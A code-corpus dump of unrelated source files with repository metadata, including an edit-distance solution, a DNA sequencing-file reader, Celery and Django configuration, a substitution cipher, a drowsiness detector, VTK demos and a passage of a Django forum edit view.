# 易错点,注意哪个word是行,哪个word是列; word1[i - 1] != word2[j - 1], 减1不能忘
class Solution:
    def minDistance(self, word1: str, word2: str) -> int:
        """Return the Levenshtein edit distance between word1 and word2.

        Wagner-Fischer DP, kept to two rolling rows instead of the full
        (n+1) x (m+1) table; results are identical.
        """
        cols, rows = len(word1), len(word2)
        if cols == 0:
            return rows
        if rows == 0:
            return cols
        # prev holds the DP row for the first r characters of word2.
        prev = list(range(cols + 1))
        for r in range(1, rows + 1):
            curr = [r] + [0] * cols
            for c in range(1, cols + 1):
                if word2[r - 1] == word1[c - 1]:
                    curr[c] = prev[c - 1]
                else:
                    # insert, delete, or substitute -- whichever is cheapest
                    curr[c] = 1 + min(curr[c - 1], prev[c], prev[c - 1])
            prev = curr
        return prev[cols]
"[email protected]"
] | |
9aa84188689bfa3d627c30002874472a97dc229a | 499ff5445e2017d042690c0429cf2e767a7f623f | /coral/io/_abi.py | b19a2ab0ec287ad6d000026ece9b71f749677f3a | [
"MIT"
] | permissive | blthree/coral | b6ab934c10271d7b790130fe45e622b7c66921b4 | 30514735d9a51487583535a3a7e3fbfd0fe15ed8 | refs/heads/master | 2021-01-22T10:14:52.018579 | 2017-02-19T00:28:33 | 2017-02-19T00:28:33 | 81,997,699 | 0 | 0 | null | 2017-02-14T22:58:59 | 2017-02-14T22:58:59 | null | UTF-8 | Python | false | false | 3,069 | py | '''Read and write DNA sequences.'''
import coral as cr
import numpy as np
import os
from . import parsers
from .exceptions import UnsupportedFileError
def read_abi(path, trim=True, attach_trace=True):
    '''Read a single ABI/AB1 Sanger sequencing file.

    :param path: Full path to input file.
    :type path: str
    :param trim: Determines whether the sequence will be trimmed using Richard
                 Mott's algorithm (trims based on quality).
    :type trim: bool
    :param attach_trace: Determines whether to attach the trace result as a
                         .trace attribute of the returned sequence and the
                         trace peak locations as a .tracepeaks attribute. The
                         trace attribute is a 2D numpy array with 4 columns in
                         the order GATC.
    :type attach_trace: bool
    :returns: DNA sequence.
    :rtype: coral.DNA

    '''
    filename, ext = os.path.splitext(os.path.split(path)[-1])
    abi_exts = ['.abi', '.ab1']
    if ext in abi_exts:
        with open(path) as f:
            abi = parsers.ABI(f)
    else:
        raise UnsupportedFileError('File format not recognized.')

    seq = abi.seq_remove_ambig(abi.seq)

    trace = None
    tracepeaks = None
    if attach_trace:
        # Reorder the raw channels into GATC order regardless of the
        # file's native base order.
        order = abi.data['baseorder'].upper()
        trace = np.array([abi.data['raw' + str(order.index(b) + 1)]
                          for b in 'GATC'])
        tracepeaks = np.array(abi.data['tracepeaks'])

    sequence = None
    if trim:
        try:
            sequence = cr.DNA(abi.trim(seq))
        except ValueError:
            # abi.trim raises ValueError when the read is too short to trim.
            # Previously the exception was swallowed, leaving `sequence`
            # unbound and crashing below with a NameError; fall back to the
            # untrimmed read instead.
            sequence = None
        if sequence is not None and attach_trace:
            # Adjust trace data based on trimming.  (Previously this ran even
            # with attach_trace=False and crashed on the undefined
            # `tracepeaks`.)
            trim_start = seq.index(str(sequence))
            idx = (trim_start, trim_start + len(sequence))
            peaks = tracepeaks[idx[0]:idx[1]]
            sequence.trace = trace[peaks[0]:peaks[-1], :]
            sequence.tracepeaks = peaks
    if sequence is None:
        sequence = cr.DNA(seq)

    sequence.name = abi.name
    return sequence
def read_abis(directory, trim=True, attach_trace=True):
    '''Read every ABI sequencing file found in a directory.

    :param directory: Path to directory containing sequencing files.
    :type directory: str
    :param trim: Determines whether the sequence will be trimmed using Richard
                 Mott's algorithm (trims based on quality).
    :type trim: bool
    :param attach_trace: Determines whether to attach the trace result as a
                         .trace attribute of the returned sequence. The trace
                         attribute is a 2D numpy array with 4 columns in the
                         order GATC.
    :type attach_trace: bool
    :returns: A list of DNA sequences.
    :rtype: coral.DNA list

    '''
    sequences = []
    for entry in os.listdir(directory):
        full_path = os.path.join(directory, entry)
        try:
            sequences.append(read_abi(full_path, trim=trim,
                                      attach_trace=attach_trace))
        except UnsupportedFileError:
            # Silently skip anything that is not an ABI/AB1 file.
            pass
    return sequences
| [
"[email protected]"
] | |
0d3b60023a60eed6ae0274a83fd1daecbd04b513 | 95749b75c446df3ce4aabb03d5aec90de793e207 | /gemini/taskapp/celery.py | 722f621c5679f886e12c4c93ba9692df4ba43474 | [] | no_license | Hawk94/gemini | 8288a11499c4cc12c8c79641a51b5e99afe268c5 | 3a4d0b13488b8e9fbc40dc3cde338b61bc04b494 | refs/heads/master | 2020-06-24T11:37:22.204269 | 2017-07-12T20:33:21 | 2017-07-12T20:33:21 | 96,935,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,398 | py |
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('gemini')
class CeleryConfig(AppConfig):
    """Django app config whose ready() hook wires Celery to the project."""
    name = 'gemini.taskapp'
    verbose_name = 'Celery Config'
    def ready(self):
        """Configure Celery from Django settings and autodiscover tasks."""
        # Using a string here means the worker will not have to
        # pickle the object when using Windows.
        app.config_from_object('django.conf:settings')
        installed_apps = [app_config.name for app_config in apps.get_app_configs()]
        app.autodiscover_tasks(lambda: installed_apps, force=True)
        if hasattr(settings, 'RAVEN_CONFIG'):
            # Celery signal registration
            # Imported lazily so raven is only required when Sentry is
            # actually configured.
            from raven import Client as RavenClient
            from raven.contrib.celery import register_signal as raven_register_signal
            from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
            raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
            raven_register_logger_signal(raven_client)
            raven_register_signal(raven_client)
@app.task(bind=True)
def debug_task(self):
    """Celery smoke-test task: print its own request context."""
    print('Request: {0!r}'.format(self.request)) # pragma: no cover
| [
"[email protected]"
] | |
2df9cffd7c706f44089b51dd1178e45e110bfbc7 | 8149d1030b5bc62cc82d5afedbe7486daedbf8c5 | /[829][Consecutive Numbers Sum][Medium].py | 4810671219d8327bd315d73d7fbaf90d1a403a40 | [] | no_license | guofei9987/leetcode_python | faef17bb59808197e32ed97e92e2222862e2ba8c | 23703a6fb5028d982b3febc630e28f9bb65a82a6 | refs/heads/master | 2020-03-21T18:24:33.014579 | 2019-10-12T13:29:03 | 2019-10-12T13:29:03 | 138,889,760 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | # https://leetcode.com/problems/consecutive-numbers-sum | [
"[email protected]"
] | |
cfd392a9079699ee6d0b693e945546b5a1178576 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_301/ch41_2019_04_04_16_40_15_344267.py | 6c41a0d67bc67884cf85bc1629a7262fa142531b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | a=input('que palavra? ')
# Keep prompting until the user types 'desisto' (gives up).
while a!='desisto':
    a=input('que palavra? ')
# Bug fix: the message must be a string literal -- `print(voce acertou)`
# was a SyntaxError (unquoted words).
print('voce acertou')
| [
"[email protected]"
] | |
346dfc71b0db9a749e8ee1d65b7425c276ff9cb1 | 4577d8169613b1620d70e3c2f50b6f36e6c46993 | /students/1797637/homework01/program03.py | 1dea672b0e9890cc0e4a8907a314950ef5731495 | [] | no_license | Fondamenti18/fondamenti-di-programmazione | cbaf31810a17b5bd2afaa430c4bf85d05b597bf0 | 031ec9761acb1a425fcc4a18b07884b45154516b | refs/heads/master | 2020-03-24T03:25:58.222060 | 2018-08-01T17:52:06 | 2018-08-01T17:52:06 | 142,419,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,579 | py | def codifica(chiave, testo):
''' Viene codificato e restituito un testo, fornito il testo stesso e una chiave di codifica'''
codifica=codifica_chiave(chiave)
for indice,carattere in enumerate(testo):
if carattere in codifica.keys(): testo = testo[:indice]+ testo[indice:].replace(testo[indice],codifica[carattere],1)
return testo
def decodifica(chiave, testo):
    '''Decode *testo* with the substitution map derived from *chiave* and return it.'''
    mappa = decodifica_chiave(chiave)
    # enumerate() keeps a reference to the original string, so characters
    # are taken from the initial text while the copy is rewritten in place.
    for indice, carattere in enumerate(testo):
        if carattere in mappa:
            testo = testo[:indice] + testo[indice:].replace(testo[indice], mappa[carattere], 1)
    return testo
def codifica_chiave(chiave):
    '''Build the encoding map: i-th char of the sorted key -> i-th char of the key.'''
    chiave = processa_chiave(chiave)
    ordinata = ''.join(sorted(chiave))
    return {car: chiave[i] for i, car in enumerate(ordinata)}
def decodifica_chiave(chiave):
    '''Build the decoding map: i-th char of the key -> i-th char of the sorted key.'''
    chiave = processa_chiave(chiave)
    ordinata = ''.join(sorted(chiave))
    return {car: ordinata[i] for i, car in enumerate(chiave)}
def processa_chiave(chiave):
    '''Keep only lowercase a-z characters of the key, then drop duplicates.'''
    # The for-loop iterates the ORIGINAL string object while `chiave` is
    # rebound to shrinking copies, so every original character is examined.
    for carattere in chiave:
        if ord(carattere)<ord('a') or ord(carattere)>ord('z'): chiave= chiave.replace(carattere,'')
    chiave=elimina_copie(chiave)
    return chiave
def elimina_copie(chiave):
for carattere in chiave:
if carattere in chiave[chiave.find(carattere)+1:]: chiave= chiave.replace(carattere,'',1)
return chiave | [
"[email protected]"
] | |
8ccd44a76e64b8cc0ad921f213460c409e895266 | cc7b4e71b3c27240ec650a75cc6f6bbab5e11387 | /crdb/templatetags/email_tags.py | b13eedd6c32b7950e6ee3313c89e155c42547e14 | [
"MIT"
] | permissive | jsayles/CoworkingDB | 0cdada869d950a28cfef20d1b9c1eb3eb4d7b1c2 | 78776910eba0354a7fd96b2e2c53a78e934d8673 | refs/heads/master | 2023-02-22T23:11:19.040799 | 2021-12-28T19:13:39 | 2021-12-28T19:13:39 | 883,951 | 3 | 0 | MIT | 2023-02-15T17:59:10 | 2010-09-02T18:36:43 | Python | UTF-8 | Python | false | false | 764 | py | import os
from django.template import Library
from django import template
from django.conf import settings
from django.utils.html import format_html
from django.urls import reverse
from crdb.models import EmailAddress
register = template.Library()
@register.simple_tag
def email_verified(email):
    """Render a red '(Not Verified)' link for an unverified email address.

    Accepts either an EmailAddress instance or a plain email string (which
    is looked up in the database).  Returns '' for verified addresses and
    None when no email is given.
    """
    if not email:
        return None
    if not isinstance(email, EmailAddress):
        # Got a string so we should pull the object from the database
        # NOTE(review): raises EmailAddress.DoesNotExist for unknown
        # addresses -- confirm callers only pass known emails.
        email = EmailAddress.objects.get(email=email)
    if email.is_verified():
        return ""
    html = '<span style="color:red;">( <a target="_top" style="color:red;" href="{}">{}</a> )</span>'
    link = email.get_send_verif_link()
    label = "Not Verified"
    return format_html(html, link, label)
| [
"[email protected]"
] | |
e8b2f8c81f953e4c0e4a8d266dceb71804203e01 | 7f25740b1ef47edc24db1a3618b399959b073fe1 | /1029_17_smallproject.py | 97673d239a34ef5759856f9eeba050bcf1977446 | [] | no_license | pjh9362/PyProject | b2d0aa5f8cfbf2abbd16232f2b55859be50446dc | 076d31e0055999c1f60767a9d60e122fb1fc913e | refs/heads/main | 2023-01-09T12:12:06.913295 | 2020-11-07T15:32:03 | 2020-11-07T15:32:03 | 306,814,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | cost = int(input())
cpn = input()
# Show the price after a fixed discount, depending on the coupon code.
if cpn == "Cash3000":
    print(cost-3000)
elif cpn == "Cash5000":
    print(cost-5000)
else:
    print("쿠폰이 적용되지 않았습니다.")
# NOTE(review): `cost` itself is never reduced, so this final line always
# prints the ORIGINAL price even when a discounted price was printed above
# -- confirm this matches the exercise's expected output.
print(cost)
| [
"[email protected]"
] | |
385836ada1f0c7aa8919ec7aeb97acca6aea94c0 | 644b13f90d43e9eb2fae0d2dc580c7484b4c931b | /network2.py | 5dbc8833c5526d15e355e3169680c46c4a5bc280 | [] | no_license | yeonnseok/ps-algorithm | c79a41f132c8016655719f74e9e224c0870a8f75 | fc9d52b42385916344bdd923a7eb3839a3233f18 | refs/heads/master | 2020-07-09T11:53:55.786001 | 2020-01-26T02:27:09 | 2020-01-26T02:27:09 | 203,962,358 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,318 | py | def cal_ans():
    temp = []   # up to the five most recent indices i where src[i] == 0
    ans = 0
    for i in range(len(src)):
        if src[i] == 0:
            # Slide the window: keep at most the last five zero-positions.
            if len(temp) == 5:
                temp = temp[1:]
            temp.append(i)
        else:
            # Sum of index distances from i to every remembered zero-position.
            ans += i * len(temp) - sum(temp)
            # Record the pairings (1-based) in the global adjacency list `link`.
            for j in temp:
                link[i + 1].append(j + 1)
                link[j + 1].append(i + 1)
    return ans
def cal_group():
    """Count groups in the global 0/1 sequence `src`.

    NOTE(review): contest-style heuristic; the grouping rule below is
    inferred from the code only -- verify against the problem statement
    before changing anything here.
    """
    cnt, group = 0, 0
    zero_one = False
    start, end = -1, 0
    # Leading run of 1s: each element contributes one group.
    for i in range(len(src)):
        start = i + 1
        if src[i] == 1:
            group += 1
        else:
            break
    # Trailing run of 0s: each element contributes one group.
    for i in range(len(src) - 1, -1, -1):
        end = i + 1
        if src[i] == 0:
            group += 1
        else:
            break
    # Middle section: long zero-runs (>= 5) add extra groups; remember
    # whether a short "0 followed by 1" transition was seen.
    for i in range(start, end):
        if src[i] == 0:
            cnt += 1
        elif src[i] == 1:
            if cnt >= 5:
                group += (cnt - 4)
            elif i >= 1 and src[i-1] == 0:
                zero_one = True
            cnt = 0
    if zero_one and len(src) != 1:
        return group + 1
    return group
# Contest-style driver: read T test cases, each a length n plus a 0/1 row.
num_of_case = int(input())
for case in range(1, num_of_case + 1):
    n = int(input())
    src = list(map(int, input().split()))
    # 1-based adjacency list; filled as a side effect inside cal_ans().
    link = [[] for _ in range(n + 1)]
    print("#%d" % case, end=" ")
    print(cal_ans(), end=" ")
    print(cal_group())
| [
"[email protected]"
] | |
ab0b8196c759f436a72d4ad731e16756cc9d4511 | 699cf40f6326b954a40b78e87317a62401bd4c2c | /.history/Drowsy_Detection_20210728124624.py | 935884724404299f8e03c238ed4ff5289a4858c5 | [] | no_license | KhanhNguyen1308/Python-mediapippe | e3927f9c0c6499d8a3ba50a675617b89197dce89 | 981412efd39bd29c34a66afbec88abdabcb47ab9 | refs/heads/main | 2023-06-25T18:37:43.234063 | 2021-07-29T11:35:31 | 2021-07-29T11:35:31 | 368,535,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,727 | py | import cv2
import time
import numpy as np
import mediapipe as mp
import tensorflow as tf
from threading import Thread
from head_pose_ratio import head_pose_ratio
from function import draw_point, eye_avg_ratio, put_text
from Angle_head_pose_ratio import head_pose_status, eye_stat
from mode import sleep_mode
# TFLite model fed with the six head-pose ratios (x1..x6) in the main loop.
interpreter = tf.lite.Interpreter('model.tflite')
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
# Video source: prerecorded clip; switch to the commented line for a webcam.
cap = cv2.VideoCapture('Video/test_1406.mp4')
# cap = cv2.VideoCapture(0)
pTime = 0           # timestamp of the previous frame (for FPS)
time_active = 0     # number of completed one-minute windows
m = 0               # frames successfully processed with a face
status = ''
# MediaPipe face-mesh pipeline used to extract facial landmarks.
mpDraw = mp.solutions.drawing_utils
mpFaceMesh = mp.solutions.face_mesh
faceMesh = mpFaceMesh.FaceMesh()
drawSpec = mpDraw.DrawingSpec(thickness=1, circle_radius=2)
eye_status = ''
x_status = ''
y_status = ''
z_status = ''
head_status = ''
Drowsy_mode = ''
draw = False
t = 0
ear = 0             # eye aspect ratio of the current frame
# Per-minute blink bookkeeping; reset every 60 s inside the main loop.
start_time = time.time()
count = 0
blink = 0
blink_perM = 0
pre_blink = 0
while True:
    ret, img = cap.read()
    ih, iw = img.shape[0], img.shape[1]
    # MediaPipe expects RGB frames; OpenCV delivers BGR.
    imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    results = faceMesh.process(imgRGB)
    if results:
        face = []
        Mount = []
        Left_eye = []
        Right_eye = []
        try:
            # Collect every landmark as integer pixel coordinates.
            for face_lms in results.multi_face_landmarks:
                for lm in face_lms.landmark:
                    x, y = int(lm.x * iw), int(lm.y * ih)
                    face.append([x, y])
            # Indices below select nose / eye / mouth points from the mesh.
            nose = face[5]
            Left_eye.append([face[249], face[374], face[380], face[382], face[385], face[386]])
            Right_eye.append([face[7], face[145], face[153], face[155], face[158], face[159]])
            Mount.append([face[308], face[317], face[14], face[87], face[61], face[82], face[13], face[312]])
            img = draw_point(img, nose, Left_eye, Right_eye, Mount)
            ear = eye_avg_ratio(Left_eye, Right_eye)
            x1, x2, x3, x4, x5, x6 = head_pose_ratio(nose, Left_eye, Right_eye)
            # Feed the six ratios to the TFLite model.
            # NOTE(review): the model's output tensor is never read --
            # confirm whether the invoke() result is intentionally unused.
            input_shape = input_details[0]['shape']
            input_data = np.array((x1, x2, x3, x4, x5, x6), dtype=np.float32)
            interpreter.set_tensor(input_details[0]['index'], input_data)
            interpreter.invoke()
            img = cv2.putText(img, str(x5), (nose[0] - 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
            img = cv2.putText(img, str(x6), (nose[0] + 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
            head_status, mode = head_pose_status(x5, x6, x2)
            eye_status, blink, count = eye_stat(ear, count, blink, mode)
            if mode == 1:
                print(round(ear, 3))
            Drowsy_mode = sleep_mode(mode, ear, blink)
            m += 1
        except:
            # NOTE(review): bare except -- any failure (typically a missing
            # or partial face) falls through here; consider narrowing.
            eye_status = 'None Face'
            x_status = 'None Face'
            y_status = 'None Face'
    cTime = time.time()
    fps = int(1 / (cTime - pTime))
    pTime = cTime
    img = cv2.putText(img, str(m), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1)
    text_fps = 'FPS:' + str(fps)
    text_EaR = 'Eye_avg_Ratio: ' + str(round(ear, 2))
    text_Head_pose = 'Head_pose: ' + head_status
    text_ES = 'Eye_Status: ' + eye_status
    text_blink = 'Blink_Num: ' + str(blink)
    text_blink_avg = 'Blink_AVG: ' + str(blink_perM)
    img = put_text(img, text_fps, text_EaR, text_ES, text_blink, text_blink_avg, text_Head_pose)
    cv2.imshow('results', img)
    # Once per minute: roll the blink counter into the per-minute figure.
    if (time.time() - start_time) > 60:
        start_time = time.time()
        time_active += 1
        blink_perM = blink
        pre_blink = blink
        blink = 0
    key = cv2.waitKey(1)
    # if m == 900:
    #     break
    if key == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
181d7604566e31eea4b774b2ae9b3356926009e6 | a40950330ea44c2721f35aeeab8f3a0a11846b68 | /VTK/Actors/ThreeLine.py | e780418bfccbe2f4be8ca077eaf8f0c68c4225b5 | [] | no_license | huang443765159/kai | 7726bcad4e204629edb453aeabcc97242af7132b | 0d66ae4da5a6973e24e1e512fd0df32335e710c5 | refs/heads/master | 2023-03-06T23:13:59.600011 | 2023-03-04T06:14:12 | 2023-03-04T06:14:12 | 233,500,005 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,218 | py | import vtk
# Visualize
colors = vtk.vtkNamedColors()
# Create points
p0 = [0.0, 0.0, 0.0]
p1 = [1.0, 0.0, 0.0]
p2 = [1.0, 1.0, 0.0]
p3 = [0.0, 1.0, 0.0]
p4 = [2.0, 0.0, 0.0]
p5 = [2.0, 1.0, 0.0]
# LineSource: draw a line with two points
def createLine1():
    """Build a mapper for a single two-point line segment (p1 -> p2)."""
    source = vtk.vtkLineSource()
    source.SetPoint1(p1)
    source.SetPoint2(p2)
    line_mapper = vtk.vtkPolyDataMapper()
    line_mapper.SetInputConnection(source.GetOutputPort())
    return line_mapper
# LineSource Multi-point continuous straight line
def createLine2():
    """Build a mapper for a continuous polyline through p0, p1, p2, p3."""
    source = vtk.vtkLineSource()
    pts = vtk.vtkPoints()
    for point in (p0, p1, p2, p3):
        pts.InsertNextPoint(point)
    source.SetPoints(pts)
    poly_mapper = vtk.vtkPolyDataMapper()
    poly_mapper.SetInputConnection(source.GetOutputPort())
    return poly_mapper
# LineSource multi-point set geometry + topology
def createLine3(): # multiple segments: one polydata carries several lines
    """Build a mapper holding two explicit line cells (p0-p1 and p1-p4)."""
    # Create a vtkPoints object and store the points in it
    points = vtk.vtkPoints()
    points.InsertNextPoint(p0)
    points.InsertNextPoint(p1)
    points.InsertNextPoint(p2)
    points.InsertNextPoint(p3)
    points.InsertNextPoint(p4)
    points.InsertNextPoint(p5)
    # Create a cell array to store the lines in and add the lines to it
    lines = vtk.vtkCellArray()
    # for i in range(0, 5, 2):
    #     line = vtk.vtkLine()
    #     line.GetPointIds().SetId(0, i)
    #     line.GetPointIds().SetId(1, i + 1)
    #     lines.InsertNextCell(line)
    line = vtk.vtkLine() # a vtkLine has two endpoints by default
    # print(line.GetPointIds())
    # line.GetPointIds().SetNumberOfIds(4) # can be set to N endpoints
    # SetId: first argument is the endpoint slot, second the point index.
    line.GetPointIds().SetId(0, 0)
    line.GetPointIds().SetId(1, 1)
    lines.InsertNextCell(line)
    # The same vtkLine object is reused; InsertNextCell copies the ids.
    line.GetPointIds().SetId(0, 1)
    line.GetPointIds().SetId(1, 4)
    # line.GetPointIds().SetId(2, 4)
    lines.InsertNextCell(line)
    # Create a polydata to store everything in
    linesPolyData = vtk.vtkPolyData()
    # Add the points to the dataset geometry
    linesPolyData.SetPoints(points)
    # Add the lines to the dataset topology
    linesPolyData.SetLines(lines)
    # Setup actor and mapper
    mapper = vtk.vtkPolyDataMapper()
    mapper.SetInputData(linesPolyData)
    return mapper
def main():
    """Open a render window showing the line actor and start interaction."""
    renderer = vtk.vtkRenderer()
    renderWindow = vtk.vtkRenderWindow()
    renderWindow.SetWindowName("Line")
    renderWindow.AddRenderer(renderer)
    renderWindowInteractor = vtk.vtkRenderWindowInteractor()
    renderWindowInteractor.SetRenderWindow(renderWindow)
    # Visualize
    colors = vtk.vtkNamedColors()
    renderer.SetBackground(colors.GetColor3d("Silver"))
    actor = vtk.vtkActor()
    # The first way
    # actor.SetMapper(createLine1())
    # The second way
    # actor.SetMapper(createLine2())
    # The third way
    actor.SetMapper(createLine3())
    actor.GetProperty().SetLineWidth(4)
    actor.GetProperty().SetColor(colors.GetColor3d("Peacock"))
    renderer.AddActor(actor)
    renderWindow.Render()
    renderWindowInteractor.Start()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
18eaf4480da5398f037854fd148de9adc33abbe1 | d8940b6d45c15a84c8ee1ab298c4df8a905f956c | /pysnooper/__init__.py | 4b6ea5bc1ee65f9e361836555c20c181a5e8e0ff | [
"MIT"
] | permissive | Karanxa/PySnooper | f179c3e23627979c3a58664b966c9ae4cfa522a2 | 22f63ae09bb6d63de86496d613815ee03d191b75 | refs/heads/master | 2023-05-27T14:23:00.604201 | 2021-06-11T15:06:55 | 2021-06-11T15:06:55 | 376,061,317 | 1 | 0 | MIT | 2021-06-11T15:06:55 | 2021-06-11T15:04:02 | null | UTF-8 | Python | false | false | 812 | py | # Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
'''
PySnooper - Never use print for debugging again
Usage:
import pysnooper
@pysnooper.snoop()
def your_function(x):
...
A log will be written to stderr showing the lines executed and variables
changed in the decorated function.
For more information, see https://github.com/cool-RR/PySnooper
'''
from .tracer import Tracer as snoop
from .variables import Attrs, Exploding, Indices, Keys
import collections
# Named triple so version components can be compared individually.
__VersionInfo = collections.namedtuple('VersionInfo',
                                       ('major', 'minor', 'micro'))
__version__ = '0.5.0'
# e.g. VersionInfo(major=0, minor=5, micro=0), derived from __version__.
__version_info__ = __VersionInfo(*(map(int, __version__.split('.'))))
del collections, __VersionInfo # Avoid polluting the namespace
| [
"[email protected]"
] | |
6017f8bc5e80a39ea78cc67cbc7474a53ad39874 | 4d259f441632f5c45b94e8d816fc31a4f022af3c | /tornado/mongodb/client.py | df52fa27df3ea41b18e3d682e2bcf182a9f48e30 | [] | no_license | xiaoruiguo/lab | c37224fd4eb604aa2b39fe18ba64e93b7159a1eb | ec99f51b498244c414b025d7dae91fdad2f8ef46 | refs/heads/master | 2020-05-25T01:37:42.070770 | 2016-05-16T23:24:26 | 2016-05-16T23:24:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,204 | py | import httplib2
from urllib import urlencode
# Python 2 demo client exercising a local articles REST endpoint.
h = httplib2.Http()
## Add articles
data = {'id':'1', 'author':'B', 'genre':'comedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'1', 'author':'C', 'genre':'comedys'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'2', 'author':'A', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'3', 'author':'X', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
## View all articles
# NOTE(review): httplib2's Http.request returns (response_headers, body);
# the names `content, response` below look swapped -- verify intent.
content, response = h.request("http://127.0.0.1:8888/articles", "GET")
print '------- all articles -------'
print response
## View articles
print '------- per articles -------'
data = {"articleid":1}
data = urlencode(data)
content, response = h.request("http://127.0.0.1:8888/articles"+ "?" + data, "GET")
#for res in response:
#    print res
print response
## Delete articles
#content, response = h.request("http://127.0.0.1:8888/articles", "DELETE")
#content, response = h.request("http://127.0.0.1:8888/articles", "GET")
#print response
| [
"[email protected]"
] | |
3a0f200b06d77ef08f908fd0474fe8e95f74cb21 | b68fea9d645de59ee31da970d3dc435460fde9de | /discussboard/views_edit.py | a7cc8324343a334ab42398e43c09249b9d270868 | [
"BSD-3-Clause"
] | permissive | shagun30/djambala-2 | 03fde4d1a5b2a17fce1b44f63a489c30d0d9c028 | 06f14e3dd237d7ebf535c62172cfe238c3934f4d | refs/heads/master | 2021-01-10T04:20:30.735479 | 2008-05-22T05:02:08 | 2008-05-22T05:02:08 | 54,959,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,026 | py | # -*- coding: utf-8 -*-
"""
/dms/discussboard/views_edit.py
.. enthaelt den View zum Aendern der Eigenschaften des Diskussionsforums
Django content Management System
Hans Rauch
[email protected]
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.02 21.05.2008 get_role_choices
0.01 12.07.2007 Beginn der Arbeit
"""
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django import newforms as forms
from django.db import transaction
from django.utils.translation import ugettext as _
from dms.queries import get_site_url
from dms.roles import *
from dms.utils import get_tabbed_form
from dms.utils import info_slot_to_header
from dms.utils import get_parent_section_choices
from dms.utils import remove_link_icons
from dms.utils import get_choices_new_protected
from dms.utils_form import get_folderish_vars_edit
from dms.encode_decode import decode_html
from dms.discussboard.utils import get_dont
from dms.discussboard.help_form import help_form
from dms_ext.extension import * # dms-Funktionen ueberschreiben
# -----------------------------------------------------
@require_permission('perm_edit_folderish')
def discussboard_edit(request, item_container):
    """ Edit the properties of the discussion-board folder. """
    params = request.GET.copy()
    # 'profi' query flag: render the info slot as a plain textarea
    # (no rich-text editor id attached).
    profi_mode = params.has_key('profi')
    @transaction.commit_manually
    def save_values(item_container, old, new):
        """ Persist the changed values on item, container and metadata. """
        item_container.container.save_values(old, new)
        item_container.item.save_values(old, new)
        item_container.save_modified_values(old, new)
        transaction.commit()
    # Form is declared inside the view because several widgets depend on
    # the current item_container / profi_mode.
    class dms_itemForm ( forms.Form ) :
        title = forms.CharField(max_length=240,
                  widget=forms.TextInput(attrs={'size':60}) )
        nav_title = forms.CharField(max_length=60,
                  widget=forms.TextInput(attrs={'size':30}) )
        sub_title = forms.CharField(required=False, max_length=240,
                  widget=forms.TextInput(attrs={'size':60}) )
        text = forms.CharField(required=False,
                  widget=forms.Textarea(attrs={'rows':5, 'cols':60, 'id':'ta',
                  'style':'width:100%;'}) )
        text_more = forms.CharField(required=False,
                  widget=forms.Textarea(attrs={'rows':10, 'cols':60, 'id':'ta1',
                  'style':'width:100%;'}) )
        image_url = forms.CharField(required=False, max_length=200,
                  widget=forms.TextInput(attrs={'size':60}) )
        image_url_url = forms.URLField(required=False, max_length=200,
                  widget=forms.TextInput(attrs={'size':60}) )
        image_extern = forms.BooleanField(required=False)
        is_wide = forms.BooleanField(required=False)
        is_important = forms.BooleanField(required=False)
        if profi_mode:
            info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
                  attrs={'rows':10, 'cols':60, 'style':'width:100%;'}) )
        else:
            info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
                  attrs={'rows':10, 'cols':60, 'id':'ta2', 'style':'width:100%;'}) )
        section = forms.CharField(required=False,
                  widget=forms.Select(choices=get_parent_section_choices(item_container),
                  attrs={'size':4, 'style':'width:40%'} ) )
        has_user_support = forms.BooleanField(required=False)
        has_comments = forms.BooleanField(required=False)
        is_moderated = forms.BooleanField(required=False)
        is_browseable = forms.BooleanField(required=False)
        visible_start = forms.DateField(input_formats=['%d.%m.%Y'],
                  widget=forms.TextInput(attrs={'size':10}))
        visible_end = forms.DateField(input_formats=['%d.%m.%Y'],
                  widget=forms.TextInput(attrs={'size':10}))
        # NOTE(review): show_next is declared but appears in no tab and no
        # data_init entry -- confirm whether it is still used.
        show_next = forms.BooleanField(required=False)
